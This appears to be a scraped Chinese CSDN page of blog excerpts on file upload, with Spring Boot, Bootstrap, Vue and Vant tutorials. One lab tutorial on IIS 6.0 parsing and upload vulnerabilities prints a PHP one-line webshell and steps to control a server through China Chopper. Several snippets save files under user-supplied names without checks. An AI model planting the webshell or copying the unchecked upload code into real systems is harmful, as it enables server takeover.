精华内容
下载资源
问答
  • 毕竟只是一个新手,解决这种复杂点的问题(相对而言),还是需要花费大量时间的,这篇文章花了两天的时间才实现的功能,现在就记录一下使用springboot怎么实现文件上传下载的。 我这里使用的是 springboot 2.0.3,...

    我先看一下《颈椎病康复指南》再给大家说怎么实现的这两个功能,毕竟只是一个新手,解决这种复杂点的问题(相对而言),还是需要花费大量时间的,这篇文章花了两天的时间才实现的功能,现在就记录一下使用springboot怎么实现文件上传下载的。

    我这里使用的是 springboot 2.0.3,不需要导入相关jar包,2.x 的版本已经整合进去了,直接使用即可。

    spring官网提供了 springboot 的文件上传下载案例,这是网址:https://spring.io/guides/gs/uploading-files/,使用的是流的输出,对于我这个新手来说,直接不理解,所以略过,通过网上查阅大量资料,终于把问题解决了。下面的案例是 springboot2.x 图片上传与回显。我使用的工具是idea。

    1、创建idea默认的springboot项目,我的版本是2.0.3

    2、创建一个控制层FileController

    package com.rainy.controller;
    
    import org.apache.catalina.servlet4preview.http.HttpServletRequest;
    import org.springframework.stereotype.Controller;
    import org.springframework.ui.Model;
    import org.springframework.web.bind.annotation.GetMapping;
    import org.springframework.web.bind.annotation.PostMapping;
    import org.springframework.web.bind.annotation.RequestParam;
    import org.springframework.web.multipart.MultipartFile;
    
    import java.io.*;
    import java.util.UUID;
    
    /**
     * 文件上传
     */
    @Controller
    public class FileController {
    
        @GetMapping(value = "/file")
        public String file() {
            return "file";
        }
    
        @PostMapping(value = "/fileUpload")
        public String fileUpload(@RequestParam(value = "file") MultipartFile file, Model model, HttpServletRequest request) {
            if (file.isEmpty()) {
                System.out.println("文件为空空");
            }
            String fileName = file.getOriginalFilename();  // 文件名
            String suffixName = fileName.substring(fileName.lastIndexOf("."));  // 后缀名
            String filePath = "D://temp-rainy//"; // 上传后的路径
            fileName = UUID.randomUUID() + suffixName; // 新文件名
            File dest = new File(filePath + fileName);
            if (!dest.getParentFile().exists()) {
                dest.getParentFile().mkdirs();
            }
            try {
                file.transferTo(dest);
            } catch (IOException e) {
                e.printStackTrace();
            }
            String filename = "/temp-rainy/" + fileName;
            model.addAttribute("filename", filename);
            return "file";
        }
    }
    

    3、创建MyWebMvcConfigurer,这里是配置资源映射路径,详细点的介绍看这篇文章:https://blog.csdn.net/qq_38762237/article/details/81283241

    /**
     * 资源映射路径
     */
    @Configuration
    public class MyWebAppConfigurer implements WebMvcConfigurer {
        @Override
        public void addResourceHandlers(ResourceHandlerRegistry registry) {
            registry.addResourceHandler("/temp-rainy/**").addResourceLocations("file:D:/temp-rainy/");
        }
    }
    

    4、jsp页面

    <%@ page contentType="text/html;charset=UTF-8" language="java" %>
    <html>
    <head>
        <title>Title</title>
    </head>
    <body>
        <form action="/fileUpload" method="post" enctype="multipart/form-data">
            <label>上传图片</label>
            <input type="file" name="file"/>
            <input type="submit" value="上传"/>
        </form>
        <p>图片:</p>
        <img src="${filename }"/>
    </body>
    </html>
    
    

    注意一点:我是使用jsp引擎来渲染,因为我不会用 Thymeleaf,添加jsp页面,springboot使用jsp页面是需要进行配置jsp整合的,默认的是 Thymeleaf 的页面,简单的就是HTML页面

    springboot配置jsp页面的方法:https://blog.csdn.net/qq_38762237/article/details/81283352

    这里写图片描述

    微信公众号

    每天Get一个小技巧

    展开全文
  • Bootstrap File Input,最好用的文件上传组件

    万次阅读 多人点赞 2016-01-29 16:33:22
    本篇介绍如何使用bootstrap fileinput.js(最好用的文件上传组件)来进行图片的展示,上传,包括springMVC后端文件保存。

    本篇介绍如何使用 Bootstrap File Input(最好用的文件上传组件)来进行图片的展示、上传,以及如何在服务器端进行文件保存。

    一、先来看效果图吧

    这里写图片描述

    这里写图片描述
    这里写图片描述

    二、引入插件的样式和脚本

    <link type="text/css" rel="stylesheet" href="${ctx}/components/fileinput/css/fileinput.css" />
    <script type="text/javascript" src="${ctx}/components/fileinput/js/fileinput.js"></script>
    <script type="text/javascript" src="${ctx}/components/fileinput/js/fileinput_locale_zh.js"></script>
    

    http://plugins.krajee.com/file-input,这是其官方文档,里面有下载地址。

    三、在页面上添加组件

    <input type="file" name="image" class="projectfile" value="${deal.image}"/>
    
    1. type=file和class=projectfile,指明其为input file类型。
    2. name指定其在后台的获取key。
    3. value指定其在展示的时候图片路径。

    四、初始化

    projectfileoptions : {
    		showUpload : false,
    		showRemove : false,
    		language : 'zh',
    		allowedPreviewTypes : [ 'image' ],
    		allowedFileExtensions : [ 'jpg', 'png', 'gif' ],
    		maxFileSize : 2000,
    	},
    // 文件上传框
    $('input[class=projectfile]').each(function() {
    	var imageurl = $(this).attr("value");
    
    	if (imageurl) {
    		var op = $.extend({
    			initialPreview : [ // 预览图片的设置
    			"<img src='" + imageurl + "' class='file-preview-image'>", ]
    		}, projectfileoptions);
    
    		$(this).fileinput(op);
    	} else {
    		$(this).fileinput(projectfileoptions);
    	}
    });
    
    1. 通过jquery获取对应的input file,然后执行fileinput方法。
    2. showUpload 设置是否有上传按钮。
    3. language指定汉化
      4. allowedFileTypes 、allowedFileExtensions 不知道为什么没有起到效果?
    4. maxFileSize 指定上传文件大小

    五、带file文件的form表单通过ajax提交

    我们先来看带file的form表单布局。

    <form class="form-horizontal required-validate" action="${ctx}/save?callbackType=confirmTimeoutForward" enctype="multipart/form-data" method="post" οnsubmit="return iframeCallback(this, pageAjaxDone)">
    
    	<div class="form-group">
    		<label for="" class="col-md-1 control-label">项目封面</label>
    		<div class="col-md-10 tl th">
    			<input type="file" name="image" class="projectfile" value="${deal.image}" />
    			<p class="help-block">支持jpg、jpeg、png、gif格式,大小不超过2.0M</p>
    		</div>
    	</div>	
    	<div class="form-group text-center ">
    		<div class="col-md-10 col-md-offset-1">
    			<button type="submit" class="btn btn-primary btn-lg">保存</button>
    		</div>
    	</div>
    </form>				
    
    1. enctype="multipart/form-data"必不可少。
    2. οnsubmit="return iframeCallback(this, pageAjaxDone)"方法,通过ajax提交表单(iframeCallback),并且上传成功后调用回调函数(pageAjaxDone)进行下一步操作。

    关于iframeCallback的介绍,请参照 summernote所在form表单的数据提交,这里就不多做介绍了。

    然后我们来介绍一下回调函数pageAjaxDone。

    function pageAjaxDone(json) {
    	YUNM.debug(json);
    	YUNM.ajaxDone(json);
    
    	if (json[YUNM.keys.statusCode] == YUNM.statusCode.ok) {
    		var msg = json[YUNM.keys.message];
    		// 弹出消息提示
    		YUNM.debug(msg);
    
    		if (YUNM.callbackType.confirmTimeoutForward == json.callbackType) {
    			$.showSuccessTimeout(msg, function() {
    				window.location = json.forwardUrl;
    			});
    		}
    	}
    }
    

    其主要的功能就是通过ajaxDone方法处理服务端传递过来的错误消息,假如说服务端操作成功,那么会显示提示信息,进而跳转到对应的url。

    六、服务器端保存图片

    请参照后端springMVC文件保存


    ps:以上博客留了一个小疑问,一直没有去研究,直到有位非常棒的小伙伴 ihchenchen 给了我如下的提醒:

    allowedFileTypes 、allowedFileExtensions 我知道为什么没有效果,因为 fileinput() 方法调用了两次,一次在 fileinput.js 里面最后几行,还有一次就是你自己写的 $(this).fileinput()。在fileinput.js里的是没有设置allowedFileTypes 、allowedFileExtensions 值的。

    有两种方法可以改:
    1、把fileinput.js里的最后几行调用注释掉。
    2、全部使用“data-”的方法来做,不写$(this).fileinput()。

    对于ihchenchen善意的提醒,我非常的感谢,虽然他提供的解释并没有解决我的疑问,但是我很喜欢这样有互动的技术交流,之前写很多博客,基本上很少发生这样善意并且行之有效的回答。这让我想起中国程序员和外国程序员,里面的故事让人震撼之余,捎带着些许的惭愧。那么如何做到“Ask questions, get answers, no distractions。”就显得特别珍贵,而“ihchenchen”则充满这种精神!

    六、解惑allowedFileTypes 、allowedFileExtensions

    之前困惑为什么bootstrap fileinput为什么设置了这两个属性后,没有效果,其实是我自己的误解,如今经过一番痛彻的领悟后恍然大悟!

    ①、allowedFileTypes

    allowedFileTypes
    array the list of allowed file types for upload. This by default is set to null which means the plugin supports all file types for upload. If an invalid file type is found, then a validation error message as set in msgInvalidFileType will be raised. The following types as set in fileTypeSettings are available for setup.

    [‘image’, ‘html’, ‘text’, ‘video’, ‘audio’, ‘flash’, ‘object’]

    先从“allowedFileTypes”说起,该属性告知我们文件的选择类型,那么我们很容易想到这样的画面:
    这里写图片描述

    也就是说,我们希望此时的“所有文件”处不是“所有文件”,而是“image”之类的。显然这样的逻辑并没有错,但却不适合bootstrap fileinput!

    那么,这个时候我就很容易认为“allowedFileTypes” 没有起到作用!

    但请看下图:
    这里写图片描述

    吼吼,原来是在你选择了文件后发生的类型检查!

    ②、allowedFileTypes工作原理

    			$(this).fileinput({
    				showUpload : false,
    				showRemove : false,
    				language : 'zh',
    				allowedPreviewTypes: ['image'],
    		        allowedFileTypes: ['image'],
    		        allowedFileExtensions:  ['jpg', 'png'],
    				maxFileSize : 2000,
    				
    			});
    

    通过fileinput方法我们加载一个bootstrap fileinput组件,那么其内部是如何实现allowedFileTypes的呢?

    通过在fileinput.js文件中搜索“allowedFileTypes”关键字,我们得到如下代码:

     var node = ctr + i, previewId = previewInitId + "-" + node, isText, file = files[i],
                        caption = self.slug(file.name), fileSize = (file.size || 0) / 1000, checkFile, fileExtExpr = '',
                        previewData = objUrl.createObjectURL(file), fileCount = 0, j, msg, typ, chk,
                        fileTypes = self.allowedFileTypes, strTypes = isEmpty(fileTypes) ? '' : fileTypes.join(', '),
                        fileExt = self.allowedFileExtensions, strExt = isEmpty(fileExt) ? '' : fileExt.join(', ');
    

    然后我们继续看到如下的代码:

     if (!isEmpty(fileTypes) && isArray(fileTypes)) {
                        for (j = 0; j < fileTypes.length; j += 1) {
                            typ = fileTypes[j];
                            checkFile = settings[typ];
                            chk = (checkFile !== undefined && checkFile(file.type, caption));
                            fileCount += isEmpty(chk) ? 0 : chk.length;
                        }
                        if (fileCount === 0) {
                            msg = self.msgInvalidFileType.replace('{name}', caption).replace('{types}', strTypes);
                            self.isError = throwError(msg, file, previewId, i);
                            return;
                        }
                    }
    

    我们可以发现,文件类型的检查是发生在checkFile方法上,那么checkFile方法到底做了些什么呢?

     defaultFileTypeSettings = {
            image: function (vType, vName) {
                return (vType !== undefined) ? vType.match('image.*') : vName.match(/\.(png|jpe?g)$/i);
            },
            ...
    

    以上就是checkFile的内容。

    1. 也就是说当我们指定allowedFileTypes: ['image'],时,就会进行image的类型检查。
    2. 显然我们选择的txt文件不属于image类型,那么就会匹配不上,出现以上界面。
    3. 同时,该方法告诉我们,当不指定allowedFileTypes: ['image'],,只指定allowedFileExtensions: ['jpg', 'png'],就会执行vName.match(/\.(png|jpe?g)$/i),也就是文件后缀类型的检查,这点很关键啊,为我们接下来介绍“allowedFileExtensions”奠定基础。

    ③、allowedFileExtensions什么时候起作用

    上节我们讨论完“allowedFileTypes”,捎带说了“allowedFileExtensions”,那么如何让后缀进行check呢?

    			$(this).fileinput({
    				showUpload : false,
    				showRemove : false,
    				language : 'zh',
    				allowedPreviewTypes: ['image'],
    		        allowedFileExtensions:  ['jpg', 'png'],
    				maxFileSize : 2000,
    				
    			});
    

    fileinput组件此时指定的属性如上,没有了“allowedFileTypes”,并且指定允许的后缀类型为“[‘jpg’, ‘png’]”,也就是说,假如我们选择了gif的图片就会出现错误提示。
    这里写图片描述

    错误预期的发生了,那么请特别注意:

    image: function (vType, vName) {
                return (vType !== undefined) ? vType.match('image.*') : vName.match(/\.(png|jpe?g)$/i);
            },
    

    fileinput.js文件中原始的代码如下:

     image: function (vType, vName) {
                return (vType !== undefined) ? vType.match('image.*') : vName.match(/\.(gif|png|jpe?g)$/i);
            },
    

    image类型的后缀当然默认包含了gif,我只是为了举例说明,代码做了调整,请注意!


    好了,老铁,能否来个 2 连:

    1、为本文点赞,让更多的小伙伴看到这篇文章。
    2、微信搜索「沉默王二」,关注后回复关键字「666」可以获得一份 500G 的高清教学视频,Bootstrap 也有哟。

    展开全文
  • SpringBoot文件上传下载和多文件上传(图文详解)

    万次阅读 多人点赞 2017-01-16 20:16:02
    最近在学习SpringBoot,以下是最近学习整理的实现文件上传下载的java代码: 1、开发环境: IDEA15+ Maven+JDK1.8 2、新建一个maven工程: 3、工程框架 4、pom.xml文件依赖项...

    本人微信公众号:CPP进阶之旅
    如果觉得这篇文章对您有帮助,欢迎关注 “CPP进阶之旅” 学习更多技术干货

    最近在学习SpringBoot,以下是最近学习整理的实现文件上传下载的java代码:
    1、开发环境:
    IDEA15+ Maven+JDK1.8
    2、新建一个maven工程:
    这里写图片描述
    3、工程框架
    这里写图片描述
    4、pom.xml文件依赖项

    <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
      <modelVersion>4.0.0</modelVersion>
      <groupId>SpringWebContent</groupId>
      <artifactId>SpringWebContent</artifactId>
      <packaging>war</packaging>
      <version>1.0-SNAPSHOT</version>
      <name>SpringWebContent Maven Webapp</name>
      <url>http://maven.apache.org</url>
      <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>1.4.3.RELEASE</version>
      </parent>
      <dependencies>
        <dependency>
          <groupId>org.springframework.boot</groupId>
          <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
          <groupId>org.springframework.boot</groupId>
          <artifactId>spring-boot-devtools</artifactId>
          <optional>true</optional>
        </dependency>
        <dependency>
          <groupId>junit</groupId>
          <artifactId>junit</artifactId>
          <version>3.8.1</version>
          <scope>test</scope>
        </dependency>
      </dependencies>
      <properties>
        <java.version>1.8</java.version>
      </properties>
      <build>
        <finalName>SpringWebContent</finalName>
      <plugins>
      <plugin>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-maven-plugin</artifactId>
      </plugin>
    </plugins>
      </build>
    </project>
    

    5、Application.java

    import org.springframework.boot.SpringApplication;
    import org.springframework.boot.autoconfigure.SpringBootApplication;
    @SpringBootApplication
    public class Application {
    
        public static void main(String[] args) {
            SpringApplication.run(Application.class, args);
        }
    }
    

    6、FileController.java

    import org.springframework.stereotype.Controller;
    import org.springframework.ui.Model;
    import org.springframework.web.bind.annotation.RequestMapping;
    import org.springframework.web.bind.annotation.RequestMethod;
    import org.springframework.web.bind.annotation.RequestParam;
    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.springframework.web.bind.annotation.ResponseBody;
    import org.springframework.web.multipart.MultipartFile;
    import org.springframework.web.multipart.MultipartHttpServletRequest;
    import javax.servlet.http.HttpServletRequest;
    import javax.servlet.http.HttpServletResponse;
    import java.io.*;
    import java.util.List;
    
    @Controller
    public class FileController {
        @RequestMapping("/greeting")
        public String greeting(@RequestParam(value="name", required=false, defaultValue="World") String name, Model model) {
            model.addAttribute("name", name);
            return "greeting";
        }
        private static final Logger logger = LoggerFactory.getLogger(FileController.class);
        //文件上传相关代码
        @RequestMapping(value = "upload")
        @ResponseBody
        public String upload(@RequestParam("test") MultipartFile file) {
            if (file.isEmpty()) {
                return "文件为空";
            }
            // 获取文件名
            String fileName = file.getOriginalFilename();
            logger.info("上传的文件名为:" + fileName);
            // 获取文件的后缀名
            String suffixName = fileName.substring(fileName.lastIndexOf("."));
            logger.info("上传的后缀名为:" + suffixName);
            // 文件上传后的路径
            String filePath = "E://test//";
            // 解决中文问题,liunx下中文路径,图片显示问题
            // fileName = UUID.randomUUID() + suffixName;
            File dest = new File(filePath + fileName);
            // 检测是否存在目录
            if (!dest.getParentFile().exists()) {
                dest.getParentFile().mkdirs();
            }
            try {
                file.transferTo(dest);
                return "上传成功";
            } catch (IllegalStateException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
            return "上传失败";
        }
    
        //文件下载相关代码
        @RequestMapping("/download")
        public String downloadFile(org.apache.catalina.servlet4preview.http.HttpServletRequest request, HttpServletResponse response){
            String fileName = "FileUploadTests.java";
            if (fileName != null) {
                //当前是从该工程的WEB-INF//File//下获取文件(该目录可以在下面一行代码配置)然后下载到C:\\users\\downloads即本机的默认下载的目录
                String realPath = request.getServletContext().getRealPath(
                        "//WEB-INF//");
                File file = new File(realPath, fileName);
                if (file.exists()) {
                    response.setContentType("application/force-download");// 设置强制下载不打开
                    response.addHeader("Content-Disposition",
                            "attachment;fileName=" +  fileName);// 设置文件名
                    byte[] buffer = new byte[1024];
                    FileInputStream fis = null;
                    BufferedInputStream bis = null;
                    try {
                        fis = new FileInputStream(file);
                        bis = new BufferedInputStream(fis);
                        OutputStream os = response.getOutputStream();
                        int i = bis.read(buffer);
                        while (i != -1) {
                            os.write(buffer, 0, i);
                            i = bis.read(buffer);
                        }
                        System.out.println("success");
                    } catch (Exception e) {
                        e.printStackTrace();
                    } finally {
                        if (bis != null) {
                            try {
                                bis.close();
                            } catch (IOException e) {
                                e.printStackTrace();
                            }
                        }
                        if (fis != null) {
                            try {
                                fis.close();
                            } catch (IOException e) {
                                e.printStackTrace();
                            }
                        }
                    }
                }
            }
            return null;
        }
        //多文件上传
        @RequestMapping(value = "/batch/upload", method = RequestMethod.POST)
        @ResponseBody
        public String handleFileUpload(HttpServletRequest request) {
            List<MultipartFile> files = ((MultipartHttpServletRequest) request)
                    .getFiles("file");
            MultipartFile file = null;
            BufferedOutputStream stream = null;
            for (int i = 0; i < files.size(); ++i) {
                file = files.get(i);
                if (!file.isEmpty()) {
                    try {
                        byte[] bytes = file.getBytes();
                        stream = new BufferedOutputStream(new FileOutputStream(
                                new File(file.getOriginalFilename())));
                        stream.write(bytes);
                        stream.close();
    
                    } catch (Exception e) {
                        stream = null;
                        return "You failed to upload " + i + " => "
                                + e.getMessage();
                    }
                } else {
                    return "You failed to upload " + i
                            + " because the file was empty.";
                }
            }
            return "upload successful";
        }
    

    7、index.html

    <!DOCTYPE html>
    <html lang="en">
    <head>
        <title>Getting Started: Serving Web Content</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    </head>
    <body>
    <p>Get your greeting <a href="/greeting">here</a></p>
    <form action="/upload" method="POST" enctype="multipart/form-data">
        文件:<input type="file" name="test"/>
        <input type="submit" />
    </form>
    <a href="/download">下载test</a>
    <p>多文件上传</p>
    <form method="POST" enctype="multipart/form-data" action="/batch/upload">
        <p>文件1:<input type="file" name="file" /></p>
        <p>文件2:<input type="file" name="file" /></p>
        <p><input type="submit" value="上传" /></p>
    </form>
    </html>
    
    

    本文代码参考Spring官网:https://spring.io/guides/gs/serving-web-content/
    完整工程地址:http://download.csdn.net/detail/coding13/9739116

    欢迎关注我的个人微信公众号,查看专业的客户端/服务端开发知识、笔试面试题目、程序员职场经验与心得分享。
    在这里插入图片描述

    展开全文
  • ctf-web:文件上传漏洞和文件解析漏洞

    万次阅读 2020-10-11 21:13:56
    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍. 其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,...

    这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍.
    其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么…
    当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了.
    先说说这两个漏洞的区别.
    一.文件上传漏洞
    这个漏洞产生的原因是因为上传文件的不严谨所产生的.
    比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将上传的文件存放在服务器,这样是十分危险的.并且一般和后面的文件解析漏洞配合在一起使用.
    二.文件解析漏洞
    这个漏洞是由于服务器的原因造成的,就比如我们一会儿要举例的iis6.0服务器就有这个漏洞.
    简单来说,在iis6.0服务器上,如果服务器有一个"xxx.asp"文件夹,那么就会将这个文件下面的所有文件都当成一个asp脚本去执行.

    想想看,如果我们上传了一个删除系统数据库的病毒文件上去,然后又被解析成了某种语法去执行,是不是后果很可怕?
    因此,我会特地去讲一下这个东西的如何去实现的.后面我会把网站的源码附上.很多服务器都存在这个漏洞,我这里就介绍iis6.0的文件解析漏洞,想看其他的服务器的漏洞可以去百度一下.
    工具的话我把名字发上来,自己去找一下.
    实验环境:虚拟机win2003一台,软件phpstudy,中国菜刀

    一.iis6.0服务器的文件解析漏洞

    前面已经说过,iis6.0的漏洞就是会把xxx.asp文件夹下的文件都当作asp文件执行,我们试试便知.
    win2003都会自带iis6,因此直接安装就好,安装教程我就不发了,百度有.
    如图,此刻已经是安装好的.记得点到web的选项,按照图中进行配置.
    在这里插入图片描述
    此刻我们已经搭建网站成功.用主机输入服务器ip即可进行访问.由于我之前搭建phpstudy占用了80端口,我就把端口改成了82.你们在做的时候应该是不需要这一步的.
    在这里插入图片描述
    配置好以后,点击网站,然后右键那个默认网站,点击停用.
    在这里插入图片描述
    之后右键网站->新建->网站,新建一个自己的网站.我的已经建好了,就不做多余的演示了
    在这里插入图片描述

    需要注意的是,在新建网站的时候,有个运行脚本的选项要选上.如图
    在这里插入图片描述

    在这个里面点击右键,添加一个文件,和文件夹,文件名字叫做"index.html",文件夹名字随便起一个以.asp结尾的即可,我的是wzc.asp.然后在文件夹里面新建一个文件,名字随便起一个,比如1.txt.
    在这里插入图片描述
    在这里插入图片描述
    然后在这两个新建的1.txt和index.html都写入以下的内容:

    <%
    response.write("My first ASP script!")
    %>
    

    为什么要这么建文件呢?其实就是为了验证这个漏洞的.上面的代码是asp的语法,在屏幕上显示一句话.
    如果文件被解析成了asp文件,那么就会只显示引号里面的内容.
    如果没有的话,就直接把所有内容都显示出来.
    因此.我们新建了这两个文件用来验证.

    验证一:访问非asp文件夹下的文件(我的端口是81)

    也就是网站的主页.我用主机进行访问时,页面显示的是这样的:
    在这里插入图片描述
    看,是不是直接把文件当成了一个txt文本显示了出来?

    验证二:访问以.asp结尾文件夹下的文件

    访问结果如图:
    在这里插入图片描述
    果然,我们的代码被当成了asp脚本执行了.由此验证,我们的iis6.0确实存在这个漏洞.

    二.文件上传漏洞和文件解析漏洞的结合使用

    文件上传漏洞产生的原因就不像上一个是因为服务器产生的了,而是因为程序员的不严谨而产生的.
    在一些允许上传文件的网站中,编写php后台脚本时,不会对文件近进行检查,所以有一些黑客会利用这个上传一个叫"一句话木马"的脚本.
    这种脚本属于木马,当上传成功以后,在攻击者的电脑使用比如"中国菜刀"之类的软件进行连接,最终为所欲为.
    当然,中国菜刀属于比较落后的软甲,比较先进的有冰蝎等软件.有兴趣可以百度.
    由此可见,这种漏洞的危害性是非常大的.下面我会演示一下这个过程.

    过程实现

    首先安装phpstudy,然后在你的服务器下添加下面两个网站.源码发在下面.
    文件一:upload-file.html

    <html>
    <head>
     <title> 文件上传之解析漏洞~php</title>
     </head>
    <body>
    
    <form action="upload.php" method="post"
    enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file" /> 
    <br />
    <input type="submit" name="submit" value="提交" />
    </form>
    
    </body>
    </html>
    

    文件二:upload.php

    <?php
    
      if ($_FILES["file"]["error"] > 0)
        {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        }
      else
        {
        echo "Upload: " . $_FILES["file"]["name"] . "<br />";
        echo "Type: " . $_FILES["file"]["type"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    
        if (file_exists("upload/" . $_FILES["file"]["name"]))
          {
          echo $_FILES["file"]["name"] . " already exists. ";
          }
        else
          {
          move_uploaded_file($_FILES["file"]["tmp_name"],
          "upload/" . $_FILES["file"]["name"]);
          echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
          }
        }
     
    ?>
    

    放在如图的位置.
    在这里插入图片描述
    远程访问以下,发现成功.
    在这里插入图片描述
    我们随便上传一个php文件.
    在这里插入图片描述
    …连点防御都没有(从那个php代码就可以看出,不过我是从攻击者的角度出发的,由此可证明这个php代码有文件上传的漏洞).
    如图,在服务器下有个upload文件,里面就是我们上传的文件.
    在这里插入图片描述
    这个php一句话木马只是用来测试的,是为了看看能不能上传成功.现在我把一句话木马源码奉上.

    <?php eval($_POST["wzc"]);?>
    

    这段代码的原理我就不解释了.目的是为了方便使中国菜刀进行连接.你需要修改的使引号里面的内容,这个是后面中国菜刀连接是的密码.
    如图,这个是我的中国菜刀的界面,按照图中的方式配置.
    在这里插入图片描述
    上面把你的一句话木马的网站上的路径填上.我当时为了方便,把名字改成了"1.php".后面的空填刚刚的密码,下面记得选择php(eval)代码类型.连接以后,右键文件管理,会产生如图的效果.
    在这里插入图片描述
    看,现在我们就进到服务器里面了,接下来想怎么搞就怎么搞了.

    好了,就写这么多吧.
    剩余的也懒的想了,如果还想继续看一些东西的话,可以关注我,我后续会发一些比如数据库注入,软件破解之类的东西.
    有兴趣的可以加我qq:1392969921

    展开全文
  • **安恒A计划 文件上传**

    万次阅读 2021-01-12 14:52:06
    安恒A计划 文件上传 先附上源码吧 代码审计了一下,估计也就是js合成个图片马 php文件 合成木马直接上传, /index.php/?file=/var/www/html/uploads/62bfd63a7b411adea7a484c88cbaed0d.png 利用一下文件包含 ...
  • ctf-web:关于文件上传漏洞的深入研究

    万次阅读 2020-10-14 18:12:15
    上次我们研究了关于文件上传的漏洞,这次我们研究的内容属于上节课的补充内容,关于文件上传的绕过与防御. 怎么说呢,算是一种锻炼吧. 因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容. 其实我还是挺慌的,...
  • Vue实现文件上传和文件下载

    万次阅读 多人点赞 2018-08-22 22:09:55
    文件下载: 文件下载通常有几种方法 1.通过url下载 2.location.href 3.form提交直接下载 4.HTML5 a.download结合blob对象进行下载 第一种方式: 第一种方法是前后端的接口只给了一个API请求: 前端第一个...
  • SpringMVC文件上传,多文件上传实例

    千次下载 热门讨论 2014-03-01 20:28:21
    在上一篇SpringMVC基础教程的源码基础上增加了文件上传,多文件上传
  • Spring Boot教程(十三):Spring Boot文件上传

    万次阅读 多人点赞 2018-05-15 15:55:31
    1、创建多文件上传的jsp页面,多文件上传页面只是比单文件上传多了file选择的input而已, multiUpload.jsp 内容如下: ;charset=UTF-8" pageEncoding="UTF-8" %> <!DOCTYPE html> ; charset=UTF-8"> ,chrome=1...
  • 这里使用apache的开源jar包完成上传功能,使用jar包分别是:common-...springmvc-mvc.xml配置,这里主要配置springmvc解析器CommonsMultipartResolver等等,这里主要是配置文件上传解析器,下面是配置文件代码...
  • SpringMVC05_文件上传和下载

    万次阅读 2020-06-23 23:51:51
    SpringMVC05_文件上传文件上传 upload.jsp <%@ page contentType="text/html;charset=UTF-8" language="java" %> <%@ page isELIgnored="false" %> <html> <head> <title>...
  • 基本的SpringMVC的搭建在我的上一篇文章里已经写过了,这篇文章主要说明一下如何使用SpringMVC进行表单上的文件上传以及多个文件同时上传的步骤 SpringMVC 基础教程 框架分析:...
  • 文件上传漏洞

    万次阅读 多人点赞 2018-09-29 20:05:03
    文件上传漏洞 文件上传的过滤 上传文件过滤的绕过 上传html文件 文件上传的防御 upload-libs 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,...
  • vue之element-ui文件上传

    万次阅读 多人点赞 2018-06-29 17:47:56
    文件上传需求  对于文件上传,实际项目中我们的需求一般分两种: 对于单个的文件上传,比如拖动上传个图片之类的,或者是文件。 和表单一起实现上传(这种情况一般都是文件上传之后,后端返回保存在服务器的...
  • 本文详细讲解了SpringMVC实例单文件上传、多文件上传、文件列表显示、文件下载。 本文工程免费下载 一、新建一个Web工程,导入相关的包 springmvc的包+commons-fileupload.jar+connom-io.jar+commons-logging,jar...
  • SpringBoot 文件上传(可配置文件上传路径) 1. 在application.yml中配置文件上传路径 ,上传文件大小 application: #版本 version: 1.0.0 #文件上传路径 profile: D:/profile/ spring: servlet: multipart: ...
  • html页面实现文件上传

    万次阅读 2019-05-21 17:22:30
    因为业务的需求,需要实现一个通过浏览器把本地文件上传到服务器的功能,因为之前没有做过,所以也是经过了一番探索才实现了这个功能,这里只介绍前端的实现,后台的接收、验证和保存就不介绍了。 这个流程如下: ...
  • spring boot文件上传技术

    万次阅读 2018-09-18 14:05:49
    springboot没有自己的文件上传技术,是依赖于springMVC的文件上传技术。本文,我们将介绍下springMVC中文件上传技术,并通过示例展示下该技术在springboot项目中的应用。 上传文件,必须将表单method设置为post,并...
  • SWFUpload实现多文件上传

    千次下载 热门讨论 2014-01-17 15:48:13
    SWFUpload实现多文件上传,servlet+jsp
  • HTTP文件上传是做Web开发时的常见功能,例如上传图片、上传影片等。实现HTTP文件上传也比较简单,用任何Web端的脚本都可以轻松实现,例如PHP、JSP都有现成的函数或者类来调用。但笔者最近在做项目时遇到了一个大问题...
  • Vant Uploader 文件上传

    万次阅读 热门讨论 2019-07-05 10:11:29
    Uploader 文件上传 使用 VantUI 的 Uploader 组件进行文件上传 封装一个 upLoaderImg.js 公共方法 //upLoaderImg.js import axios from 'axios' //引入axios import { Toast } from 'vant' //引入Toast function ...
  • 使用LayUI进行文件上传(多文件上传)

    千次阅读 2019-08-15 16:31:42
    使用LayUI进行文件上传(多文件上传) 1、添加LayUI上传组件需要的js文件 jquery.min.js、layui.all.js、layer.js 2、导入Java上传组件包 commons-fileupload、commons-io 3、在spring中配置上传文件大小限制 <!-...
  • 基于springboot的文件上传

    千次阅读 多人点赞 2020-11-03 20:57:03
    基于springboot的文件上传 第一步:在vo包下创建上传前端响应类 import com.alibaba.druid.filter.AutoLoad; import lombok.AllArgsConstructor; import lombok.Data; import lombok.NoArgsConstructor; /** * ...
  • antd Upload 文件上传

    万次阅读 2018-10-11 16:14:40
